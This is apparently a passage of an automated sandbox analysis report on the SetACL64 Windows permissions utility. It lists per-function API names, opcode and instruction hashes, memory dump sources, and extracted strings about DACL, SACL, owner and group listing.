                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: DefaultUser$LocaleNametry_get_function
                              • String ID: GetUserDefaultLocaleName
                              • API String ID: 1828775994-151340334
                              • Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                              • Instruction ID: ba54f6443a4a000480a26d8a55fdf683abf156b1724e738e9d296e730f445427
                              • Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                              • Instruction Fuzzy Hash: 0EF082D0F0854291EB789B96A5856F89261EF887D0F4490B9DA1DC7B95DE3CA444C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                              • String ID:
                              • API String ID: 1321466686-0
                              • Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                              • Instruction ID: bf4c7e0746dd9d5090c672b2b2cfb28e7da028eac62b94639c8c30d0450503aa
                              • Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                              • Instruction Fuzzy Hash: B3312CA1B0E24382FA34AB2598523BD63A1EF45BC4F4450B9EA4DC73E7DE6DE8448350
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                              • Instruction ID: ff832a7a1424ca8f316282158b9ec1612dff5e5fc4398515bf2210790f0c70dd
                              • Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                              • Instruction Fuzzy Hash: 6D31F4F1E1D28289FA746B5598012FE7A90EF45BE0F5442B1EB6DC77D2CE2DE4408700
                              APIs
                                • Part of subcall function 00007FF697083FE0: GetLastError.KERNEL32(?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000,00007FF69708D70B,?,?,?), ref: 00007FF697083FEF
                                • Part of subcall function 00007FF697083FE0: SetLastError.KERNEL32(?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000,00007FF69708D70B,?,?,?), ref: 00007FF69708408D
                              • CloseHandle.KERNEL32(?,?,00000000,00007FF69707E709,?,?,?,?,00007FF69704EA35), ref: 00007FF69707E5A3
                              • FreeLibraryAndExitThread.KERNELBASE(?,?,00000000,00007FF69707E709,?,?,?,?,00007FF69704EA35), ref: 00007FF69707E5B9
                                • Part of subcall function 00007FF697088230: try_get_function.LIBVCRUNTIME ref: 00007FF69708824E
                              • ExitThread.KERNEL32 ref: 00007FF69707E5C2
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrarytry_get_function
                              • String ID:
                              • API String ID: 1393601959-0
                              • Opcode ID: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                              • Instruction ID: e6a3ad62ca8ff23704bd93c602da316f3f235adf7811689d56424b2429801247
                              • Opcode Fuzzy Hash: 1314125dbc08a1527b8b45cc3709738042c2a60f08861b77101480d1199f923b
                              • Instruction Fuzzy Hash: B4F04FA1A09A8691EA345B20845417C27A5EF40FF8F684B75D63CC22E5FF2DD8458350
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                              • Instruction ID: 9a92e3889420af4b0fda3712911cfe8c88b77a3b03535d77f54461b089b26235
                              • Opcode Fuzzy Hash: cc89c5ebab4446ecbbafaabbd929ad7d895e51dc1ae703ba52595f57cde5059a
                              • Instruction Fuzzy Hash: 1BE048A0B0870582E634572598A63BD2251EF98B91F008478C41EC7362DD3FE4458601
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn
                              • String ID: StartLoggerThreadProc: arg0==NULL
                              • API String ID: 3668304517-2114133805
                              • Opcode ID: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                              • Instruction ID: 7569a52ea8bc6bd3892958018350e8bd5d7d1a6d042dae43e03cc5f458ef3da1
                              • Opcode Fuzzy Hash: 701121a5653b672ea9e41aef133949d4364fef49f6e0b0740102384dee600f90
                              • Instruction Fuzzy Hash: 13416DB271568681EF149F29D89836D6362FF50FC8F904476DB4D87AAAEF6CD890C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: try_get_function
                              • String ID: AppPolicyGetThreadInitializationType
                              • API String ID: 2742660187-3350320272
                              • Opcode ID: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                              • Instruction ID: e889364fe385556bbfd0ba62cd8520f9d5793044fd09df0bd5723f356b40fa80
                              • Opcode Fuzzy Hash: e941d50e62de51ed76b533e4f2f07d996791261573e730f1a39f5aef81969e66
                              • Instruction Fuzzy Hash: 55E04FE1E0990691FA2D8791A8452F05211DF593F0E4853B6D93CC73E0DE2CAD998740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: FileHandleType
                              • String ID:
                              • API String ID: 3000768030-0
                              • Opcode ID: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                              • Instruction ID: 127b1981123d58b9566bab372b6bff17de7548eb1bda1c7ec841a532ce934ef9
                              • Opcode Fuzzy Hash: 41b2a8049982c7b62960df7333a90929865213e4a10fcc4cea85c37fae35e6e2
                              • Instruction Fuzzy Hash: 6631D762A28B4681E7748B1485911B92650FB45BF0B6C037ADBEEC73E0CF39F461C309
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorExitLastThread
                              • String ID:
                              • API String ID: 1611280651-0
                              • Opcode ID: 41e2e051896140ce1b9444956d64c7fa4b0dd49d901e1c883aea0d639952cdee
                              • Instruction ID: 706917241b40ec88a08136b6dbc5c0dd38e0b99f5d1b1190b75c19739f108041
                              • Opcode Fuzzy Hash: 41e2e051896140ce1b9444956d64c7fa4b0dd49d901e1c883aea0d639952cdee
                              • Instruction Fuzzy Hash: 23F05EA1E0A74682EF34AB70D81A1BC1691EF65FD4F0444B4D90EC33A2EF2CA884C300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: ErrorLast$try_get_function
                              • String ID:
                              • API String ID: 762735579-0
                              • Opcode ID: 8f1231b5a4742fffe4c4b2b4319454e99c6793e06d0136408ec8e234a4ee2fe3
                              • Instruction ID: 12c2cb888d89a2d0cb9a81b1c02b5e6299f5cba961674d8a82937c790860550b
                              • Opcode Fuzzy Hash: 8f1231b5a4742fffe4c4b2b4319454e99c6793e06d0136408ec8e234a4ee2fe3
                              • Instruction Fuzzy Hash: 3D218EA0F0C24645FA78A36198511BD6251EF84BE8F144BB5E93EC77D6DE2EB8014200
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 52441b96543818f174f3dd49744f821807b228f9e4b168960cd65c57406aec3c
                              • Instruction ID: b866b20d4b4168b7eaf97a5ac1a22788d1353247208fd18f8478e4b9bfd92934
                              • Opcode Fuzzy Hash: 52441b96543818f174f3dd49744f821807b228f9e4b168960cd65c57406aec3c
                              • Instruction Fuzzy Hash: AF815E66A08B8186E770DF25A4402ED77A0FB94BC4F049675EB9EDB752EF39E1858300
                              APIs
                              • TlsFree.KERNELBASE(?,?,?,00007FF6970833F9,?,?,?,00007FF69708371D,?,?,?,?,?,?,00007FF697082F93), ref: 00007FF697083645
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Free
                              • String ID:
                              • API String ID: 3978063606-0
                              • Opcode ID: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                              • Instruction ID: 13fe381c5844d871d2f022a69af8c5cd906888d0acd4b7ed855026ab9a861e80
                              • Opcode Fuzzy Hash: 02647a6482190b5c7ac84f0063ab76dd3e52f7ffb406aea2a6a991e3af237db9
                              • Instruction Fuzzy Hash: 61318F72B15F4581DA208F1AE4501A9B3A0F798FE4B589632DF6DC77A4DF3DD0928340
                              APIs
                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69707E258
                                • Part of subcall function 00007FF69707892C: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6970788D9), ref: 00007FF697078935
                                • Part of subcall function 00007FF69707892C: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6970788D9), ref: 00007FF69707895A
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 4036615347-0
                              • Opcode ID: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                              • Instruction ID: 210d1b8f132b705269f1a4b7ced271bee22d229133a4dfbb2a43fdc8210d478c
                              • Opcode Fuzzy Hash: 01bf2f7c1c0373d22a9fd7fc4837b34006ff1f510dd49b4efdda92cd23d07591
                              • Instruction Fuzzy Hash: 45217FB1A0A75242F7349B95995123D6B91EF45FD0F1445B8DE5CC7BD6DE3CE8024300
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: HandleModule$AddressFreeLibraryProc
                              • String ID:
                              • API String ID: 3947729631-0
                              • Opcode ID: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                              • Instruction ID: cd6ca4a1f0f3ba78aa9fd36010a49c48a87f032c8bee6d643a6b455092f9591e
                              • Opcode Fuzzy Hash: 286ab29e5b4e5e8684a2d532cff1b6c2a16fd24655239a0828d2631ae31001b4
                              • Instruction Fuzzy Hash: 92218B72E05B01CAEB208F64D4902ED77A0EB84788F44453ADA2DD3A85DF3AE485CF80
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                              • Instruction ID: 086e1970ec445587e183547a31d791e837aa5c7ce6358042c4e667cf26566592
                              • Opcode Fuzzy Hash: c30b1e064e743196e07e5390d10242aa5ba62166ee02cd7138439e9ec16f8412
                              • Instruction Fuzzy Hash: 4F116AB2A19A4283F6309B14E8401A9B3A5FF487C0F5902B5E65DDB796DF7DE8128740
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo
                              • String ID:
                              • API String ID: 3215553584-0
                              • Opcode ID: 425b56f43111a19db381f0ec0b6c24d494633eecd9a6f4ef0e937812bf1c75e9
                              • Instruction ID: a508b8d8a3e43f57bfd01bfbc92308d009357a45c852784f211e5e33ab455dc6
                              • Opcode Fuzzy Hash: 425b56f43111a19db381f0ec0b6c24d494633eecd9a6f4ef0e937812bf1c75e9
                              • Instruction Fuzzy Hash: D0113A72A10B469CEB20DFA0D8822EC37B4FB0839CF500576EA4D96B59EF34C154C390
                              APIs
                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF69708403D,?,?,0000B6CF377E791F,00007FF69707E201,?,?,?,?,00007FF69708BCFA,?,?,00000000), ref: 00007FF697085031
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                              • Instruction ID: 6525c566b81e4560cd06c3c7b737e842be0b9f20793ab89dcce1bdbe423cd5f7
                              • Opcode Fuzzy Hash: 89a5a3ef5b4c50bf8ebc705ee340fd4fffb8f9892841d30dbb7076e131b2c7ac
                              • Instruction Fuzzy Hash: 4FF09AE0F0A20781FF745BA698013F942A0DF88BC0F4C50B0D91ECA7C2FE6EE4818660
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: Startup
                              • String ID:
                              • API String ID: 724789610-0
                              • Opcode ID: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                              • Instruction ID: ae9a9752ab95968492bb6e33dc0d211ada698fa6ce1ff58d8bc978f13bafe029
                              • Opcode Fuzzy Hash: e2e48b089702cd41e97987c4de5919cfb4dbdded5e8bd07c72deee5bbe57a52e
                              • Instruction Fuzzy Hash: 9BF01CF1E196828AFB71EB14E8553B533A0FF98799F840072C58DC62A4DE2DE546CB50
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID: _invalid_parameter_noinfo_noreturn$SimpleString::operator=$ErrorLast$Information$Delete$DescriptorSecurity$Valid$ControlConvertEqualFreeLocalString
                              • String ID: DACL$ DACL: [error:$ Group: $ Group: [NULL]$ Group: [empty]$ Group: [error:$ Owner: $ Owner: [NULL]$ Owner: [empty]$ Owner: [error:$ SACL$ SACL: [error:$(not_protected$(protected$(pseudo_protected$+auto_inherited)$: $: [NULL]$: [empty]$:[NULL]$:[empty]$:[error:$> because a filter keyword matched.$> failed with: $> has a NULL security descriptor (granting full control to everyone) and is being ignored.$DACL$Group:$Group:[NULL]$Group:[empty]$Group:[error:$ListSD$Omitting ACL of: <$Owner:$Owner:[NULL]$Owner:[empty]$Owner:[error:$Parsing the SD of <$SACL$The object <
                              • API String ID: 503136041-36202760
                              • Opcode ID: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                              • Instruction ID: c61d022b5473a8d2530f80ca1e0db0683317e045753eb5e619977dcbaacbdab1
                              • Opcode Fuzzy Hash: 95b1e73e3a08943be6edc322f9fce221ccbe777883c1dbf8b4f712d1b5456688
                              • Instruction Fuzzy Hash: 76537FA2A197C299EB709F24D8547ED2361EB513D8F405272D64DC7AE9EF7CE688C300
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true
                              • Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd
                              Similarity
                              • API ID:
